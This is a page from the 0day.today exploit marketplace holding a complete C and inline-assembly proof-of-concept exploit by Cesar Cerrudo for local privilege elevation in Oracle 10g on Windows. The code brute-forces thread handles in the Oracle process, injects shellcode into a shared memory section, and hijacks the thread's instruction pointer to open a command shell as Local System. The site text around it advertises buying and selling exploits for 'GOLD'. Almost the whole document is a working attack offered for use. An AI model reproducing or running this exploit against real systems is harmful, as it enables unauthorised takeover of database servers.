0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
================================================================= Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32) ================================================================= // Argeniss - Information Security // // Oracle Database local elevation of privileges PoC exploit // // Author: Cesar Cerrudo #include <windows.h> #include <stdio.h> BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID) { HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff[100]; dwStrLen=strlen(sCommand); hKernel=LoadLibrary("Kernel32.dll"); pCreateProc=GetProcAddress(hKernel,"CreateProcessA"); strcpy(buff, "Global\\*oraspawn_buffer_"); strncat(buff, oSID,50); strcat(buff, "*"); HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); if (hMapFile == NULL) { printf("Could not open Shared Section\n\n"); return FALSE; } else printf("Shared Section opened\n"); LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0); printf("Inserting shellcode...\n"); CHAR sWinSta[]="WinSta0\\Default"; //copy shellcode _asm { pushad lea esi, Shellcode mov edi, lpMapAddress add edi, 0x500 lea ecx, End sub ecx, esi push esi push edi cld rep movsb pop edi pop esi push edi lea ecx, CommandBuf sub ecx, esi add edi, ecx mov esi, sCommand mov ecx, dwStrLen rep movsb mov [edi], 0x00 pop edi mov esi, pCreateProc mov [edi+0x0a], esi mov esi, oldEIP mov [edi+0x0e], esi add edi, 0x2f0 lea esi, sWinSta mov ecx, 0xf cld rep movsb jmp Done Shellcode: jmp Start // this gets overwritten mov ax,0xffff mov ax,0xffff mov ax,0xffff mov ax,0xffff CommandBuf: // this gets overwritten mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 Start: call getDelta getDelta: pop edx // Get shellcode/shared section pointer pushad mov eax, edx add eax, 0x200 push eax //LPPROCESS_INFORMATION add eax, 0x200 mov ebx, edx xor bl, bl lea ecx, [ebx+0x2f0] lea ebx, [eax+0x8] mov [ebx], ecx //set windows station and desktop push eax //LPSTARTUPINFO push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 lea eax, [edx-0x47] push eax // Command offset push 0x0 call [edx-0x4f] // Call create process popad push [edx-0x4b] // old thread EIP ret End: Done: popad } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { HANDLE hSrcHandle=0,hTgtHandle=0,hProcess=0; BOOL bSuccess=FALSE; DWORD pid,j; CHAR * oraSID; CONTEXT Context; if(!argv[1]||!argv[2]){ printf("Usage %s Oracle.exe PID SID , example: %s 453 orcl\n",argv[0],argv[0]); return 0; } oraSID= argv[2]; pid=atoi(argv[1]); printf("\nOpening oracle.exe PID: %d\n",pid); hProcess=OpenProcess(PROCESS_DUP_HANDLE ,FALSE,pid); if(!hProcess){ printf("\nCouldn't open oracle.exe process\n"); printf("\nCheck Oracle PID\n"); return 0; } //brute force handles to find a thread one for (j=0x200;j<=0x1000;j+=4){ hSrcHandle=(HANDLE)j; //get a local handle if(DuplicateHandle(hProcess,hSrcHandle,GetCurrentProcess(),&hTgtHandle,0,FALSE,DUPLICATE_SAME_ACCESS )){ //if we can suspend it then it's a thread handle if(SuspendThread(hTgtHandle)==0){ printf("Found thread handle: 0x%x\n",hSrcHandle); //get thread control registers Context.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hTgtHandle, &Context); //put shellcode on the shared section if (InjectShellcode(Context.Eip,oraSID)){ printf("Changing thread context...\n"); //10gR1 section base address 0x04620000 on some systems //10gR2 section base address 0x048a0000 on some systems Context.Eip = 0x048a0500; //set new IP, add 0x500 to not overwrite data already //in the section, we don't want to crash Oracle service :) SetThreadContext(hTgtHandle, &Context); //change context to jump to shellcode ResumeThread(hTgtHandle); printf("Running exploit...\n"); bSuccess=TRUE; Sleep(2000); } else bSuccess=FALSE; CloseHandle(hTgtHandle); break; } CloseHandle(hTgtHandle); } } if (bSuccess) printf("\nYou should have a command shell running as Local System :)\n"); else { printf("\nCheck Oracle SID\n"); } CloseHandle(hProcess); return 0; } # 0day.today [2024-12-24] #